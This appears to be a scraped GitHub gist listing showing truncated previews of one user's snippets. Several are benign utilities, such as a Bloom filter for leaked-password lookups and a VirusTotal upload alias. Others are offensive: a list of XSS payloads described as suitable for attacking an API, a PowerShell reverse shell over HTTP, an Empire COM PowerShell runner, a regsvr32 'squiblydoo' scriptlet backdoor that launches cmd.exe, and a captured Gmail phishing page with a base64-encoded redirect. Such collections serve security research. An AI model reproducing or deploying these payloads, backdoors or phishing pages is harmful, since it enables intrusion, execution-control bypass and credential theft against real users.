JohnTroony
/ bloom.py
Created
August 4, 2017 16:57
— forked from marcan/bloom.py
Simple Bloom filter implementation in Python 3 (for use with the HIBP password list)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # | |
| # Simple Bloom filter implementation in Python 3 | |
| # Copyright 2017 Hector Martin "marcan" <marcan@marcan.st> | |
| # Licensed under the terms of the MIT license | |
| # | |
| # Written to be used with the Have I been pwned? password list: | |
| # https://haveibeenpwned.com/passwords | |
| # | |
| # Download the pre-computed filter here (629MB, k=11, false positive p=0.0005): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # OPS Info | |
| ## Info: | |
| * Google Custom Alerts: http://google.com/alerts/ | |
| * Google Reverse Image search instructions: https://support.google.com/websearch/answer/1325808?hl=en | |
| ## Antitheft Apps : | |
| * Lookout: https://www.lookout.com/ |
JohnTroony
/ 666_lines_of_XSS_vectors.html
Created
February 1, 2017 07:06
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from twitter import Twitter, OAuth, TwitterHTTPError | |
| import os | |
| # put your tokens, keys, secrets, and Twitter handle in the following variables | |
| OAUTH_TOKEN = "" | |
| OAUTH_SECRET = "" | |
| CONSUMER_KEY = "" | |
| CONSUMER_SECRET = "" | |
| TWITTER_HANDLE = "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Casey Smith @subTee | |
| License: BSD3-Clause | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Execute Commands on Client. | |
JohnTroony
/ EmpireCOMPosh.cs
Created
May 17, 2016 08:19
Allows PowerShell Commands To Execute via JavaScript via COM. PowerShell without PowerShell.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; |
JohnTroony
/ Backdoor-Minimalist.sct
Created
April 22, 2016 06:00
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="Empire" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); |
JohnTroony
/ virustotal_upload
Created
April 21, 2016 14:35
— forked from luca-m/virustotal_upload
Upload a sample to VirusTotal and pretty print the report. All in a handy alias.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Upload a sample to VirusTotal and pretty print the report. All in a handy alias. | |
| # | |
| # Dependecies: | |
| # | |
| # * python > 2.7 | |
| # * pip install Pygments==1.4 | |
| # * curl | |
| # * VirusTotal API key | |
| # |
JohnTroony
/ trackerPIDs_plotly.py
Created
February 28, 2016 08:01
Using plotly to visualize PIDs of XFCE Tracker Application
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from plotly.offline import plot | |
| import plotly.graph_objs as go | |
| import csv as csv | |
| # Open the CSV file with data | |
| readdata = csv.reader(open("cleanedTracks.csv")) | |
| # Create empty lists for the data | |
| miner_user_guides = [] | |
| miner_apps = [] |
JohnTroony
/ anazita.html
Created
December 8, 2015 14:38
Gmail Phising Page at http://anazita.com/xmz Using Base64 and Javascript to steal your session and password.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!--Using meta redirect--> | |
| <meta http-equiv="Refresh" content="0; url= data:text/html;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQoJPGhlYWQ+DQoJCTxsaW5rIGhyZWY9Imh0dHA6Ly9zc2wuZ3N0YXRpYy5jb20vZG9jcy9kb2NsaXN0L2ltYWdlcy9pbmZpbml0ZV9hcnJvd19mYXZpY29uXzQuaWNvIiByZWw9InNob3J0Y3V0IGljb24iIC8+DQoJCTxtZXRhIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCIgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiAvPg0KCQk8bWV0YSBjaGFyc2V0PSJ1dGYtOCIgLz4NCgkJPG1ldGEgY29udGVudD0id2lkdGg9MzAwLCBpbml0aWFsLXNjYWxlPTEiIG5hbWU9InZpZXdwb3J0IiAvPg0KCQk8bWV0YSBuYW1lPSIiIHZhbHVlPSJub3RyYW5zbGF0ZSIgLz4NCgkJPG1ldGEgY29udGVudD0iIGlzIGVtYWlsIHRoYXQncyBpbnR1aXRpdmUsIGVmZmljaWVudCwgYW5kIHVzZWZ1bC4gMTUgR0Igb2Ygc3RvcmFnZSwgbGVzcyBzcGFtLCBhbmQgbW9iaWxlIGFjY2Vzcy4iIG5hbWU9ImRlc2NyaXB0aW9uIiAvPg0KCQk8dGl0bGU+IDwvdGl0bGU+DQoJCTxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpAZm9udC1mYWNlIHsNCiAgZm9udC1mYW1pbHk6ICdPcGVuIFNhbnMnOw0KICBmb250LXN0eWxlOiBub3JtYWw7DQogIGZvbnQtd2VpZ2h0OiAzMDA7DQogIHNyYzogbG9jYWwoJ09wZW4gU2FucyBMaWdodCcpLCBsb2NhbCgnT3BlblNhbnMtTGlnaHQnKSwgdXJsKG |